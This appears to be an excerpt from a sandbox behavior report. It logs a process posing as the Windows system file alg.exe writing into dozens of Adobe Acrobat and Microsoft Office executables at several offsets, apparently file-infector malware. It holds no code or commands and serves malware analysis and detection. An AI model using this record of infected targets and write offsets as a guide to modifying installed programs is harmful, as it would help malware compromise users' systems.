Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59362816	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59936332	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 59936256	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 140924	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 50176	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 623692	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 623616	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 24668	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 328192	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 901708	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 901632	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 4988	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 642048	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 1215564	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 1215488	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 132252	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 11459072	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 12032588	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 12032512	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 4630732	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 192512	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 766028	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 765952	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 95345	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 759296	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 1332812	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 1332736	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 285633	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 385536	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 959052	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 958976	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 182364	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 123904	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 697420	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 697344	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 66716	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1102848	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1676364	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1676288	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 753617	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 2531840	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 3105356	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 3105280	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 1150992	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 459776	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 1033292	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 1033216	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 209348	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 99840	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 673356	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 673280	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 69527	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 256512	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 830028	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 829952	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 72028	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 521216	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 1094732	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 1094656	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 321696	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 210944	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 784460	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 784384	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 126840	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 13312	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 586828	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 586752	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 2828	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 4785664	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 5359180	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 5359104	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 2430581	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 632832	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 1206348	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 1206272	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 206444	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 2578944	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 3152460	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 3152384	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 16859	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 1617920	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 2191436	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 2191360	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 860981	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 258048	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 831564	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 831488	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 82352	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5274624	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5848140	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0	Jump to behavior
